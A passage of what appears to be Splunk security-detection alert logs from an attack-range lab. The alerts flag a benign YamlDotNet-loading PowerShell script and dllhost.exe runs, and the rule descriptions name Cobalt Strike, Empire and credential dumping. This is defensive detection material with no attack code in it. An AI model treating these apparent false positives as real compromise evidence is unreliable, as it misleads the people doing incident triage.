\"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664910000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664910000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3684", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664910000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664910000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xe64", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664913332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T18:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T18:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664913332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T18:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T18:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664913332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T18:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T18:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664913332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T18:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T18:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664906400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664906400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6040", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664906400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664906400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1798", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664902800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664902800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\dllhost.exe", process_id="5660", process_name="dllhost.exe", process_path="C:\\Windows\\SysWOW64\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664902800, search_name="ESCU - 